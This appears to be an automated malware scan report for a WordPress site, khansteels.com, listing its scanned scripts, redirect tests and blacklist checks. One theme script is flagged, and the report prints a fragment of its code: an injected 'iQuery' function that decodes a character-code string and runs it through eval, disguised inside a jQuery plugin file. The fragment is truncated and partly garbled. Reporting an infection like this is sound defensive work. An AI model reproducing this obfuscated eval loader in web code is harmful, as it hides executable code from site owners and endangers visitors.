Scanned pages/files
Request | Server response | Status |
http://khansteels.com/ | 200 OK Content-Length: 35236 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?ver=3.5.2 | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3 | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://khansteels.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/hashchange.js | 200 OK Content-Length: 4831 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/dpagination.js | 200 OK Content-Length: 1326 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/smthemes.js?ver=267 | 200 OK Content-Length: 9028 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/jquery.cycle.all.js | 200 OK Content-Length: 53031 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
iQuery=function(x) { var temp="",i,c=0,out="";l=x.length; while(c<=x.length-1){while(x.charAt(c)!='!')temp=temp+x.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";} eval(out); } ;(function($, undefined) { var ver = '2.9999'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { win var rr = r < w ? r + parseInt(step * ((w-r)/count || 1),10) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); $.extend(opts.cssBefore, { display: 'block', opacity: 1, top: 0, left: 0 }); opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery);
Antivirus reports:
http://khansteels.com/wp-content/plugins/image-horizontal-reel-scroll-slideshow/image-horizontal-reel-scroll-slideshow.js | 200 OK Content-Length: 3887 Content-Type: application/javascript | clean |
http://khansteels.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 12417 Content-Type: application/javascript | clean |
http://khansteels.com/home-2/ | 200 OK Content-Length: 33965 Content-Type: text/html | clean |
http://khansteels.com/wp-content/themes/homedecore/js/smthemes.js?ver=493 | 200 OK Content-Length: 9028 Content-Type: application/javascript | clean |
http://khansteels.com/wp-includes/js/comment-reply.min.js?ver=3.5.2 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: khansteels.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 19 Apr 2014 22:34:37 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=e2b5395acbaf01f65ed064fa0c6a652d; path=/
X-Pingback: http://khansteels.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: khansteels.com
Referer: http://www.google.com/search?q=khansteels.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=khansteels.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khansteels.com/
Result: khansteels.com is not infected or malware details are not published yet.